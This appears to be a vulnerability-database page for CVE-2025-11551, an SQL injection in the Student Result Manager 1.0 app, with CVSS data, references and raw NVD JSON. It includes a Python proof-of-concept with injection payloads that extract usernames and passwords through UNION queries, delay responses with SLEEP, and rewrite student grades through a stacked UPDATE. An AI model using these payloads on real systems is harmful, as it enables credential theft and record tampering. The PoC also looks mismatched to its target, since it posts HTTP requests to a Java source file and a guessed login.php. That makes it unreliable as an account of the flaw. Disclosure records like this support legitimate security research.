CVE-2025-11551

Description

A vulnerability was determined in code-projects Student Result Manager 1.0. This affects an unknown function of the file src/students/Database.java. This manipulation of the argument roll/name/gpa causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:student_result_manager:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Student Result Manager 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11551 - Student Result Manager SQL Injection PoC
# Target: src/students/Database.java - parameters: roll, name, gpa

import requests

TARGET_URL = "http://target-host/student_result/"
LOGIN_URL = TARGET_URL + "login.php"
INJECT_URL = TARGET_URL + "src/students/Database.java"

# Step 1: Authenticate with low-privilege credentials
session = requests.Session()
login_data = {
    "username": "valid_user",
    "password": "valid_password"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit SQL Injection via 'roll' parameter (example payloads)
# Payload 1: Boolean-based blind injection
payload_roll = "1' OR '1'='1' -- "

# Payload 2: UNION-based injection to extract data
payload_union = "1' UNION SELECT username, password, NULL FROM users -- "

# Payload 3: Time-based blind injection
payload_time = "1' AND SLEEP(5) -- "

# Payload 4: Stacked query for data modification
payload_stacked = "1'; UPDATE students SET gpa='4.0' WHERE roll='1' -- "

# Step 3: Send malicious request
inject_data = {
    "roll": payload_union,
    "name": "test' OR '1'='1",
    "gpa": "3.5' OR '1'='1"
}

response = session.post(INJECT_URL, data=inject_data)
print("Response status:", response.status_code)
print("Response body:", response.text)

# Note: Adjust endpoints and parameter names based on actual application structure
# The vulnerability exists in Database.java where roll/name/gpa parameters
# are concatenated directly into SQL queries without parameterization.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11551
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11551
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11551/
[4] VulDB https://vuldb.com/cve/CVE-2025-11551
[5] https://code-projects.org/
[6] https://github.com/lakshayyverma/CVE-Discovery/blob/main/Student%20Result%20Manager.md
[7] https://vuldb.com/?ctiid.327710
[8] https://vuldb.com/?id.327710
[9] https://vuldb.com/?submit.670256
[10] https://github.com/lakshayyverma/CVE-Discovery/blob/main/Student%20Result%20Manager.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11551", "sourceIdentifier": "[email protected]", "published": "2025-10-09T18:15:49.333", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Student Result Manager 1.0. This affects an unknown function of the file src/students/Database.java. This manipulation of the argument roll/name/gpa causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:student_result_manager:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "64F64D7A-2DD4-4DAC-B9BF-4A74B93AAF4B"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Student%20Result%20Manager.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327710", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327710", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670256", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Student%20Result%20Manager.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}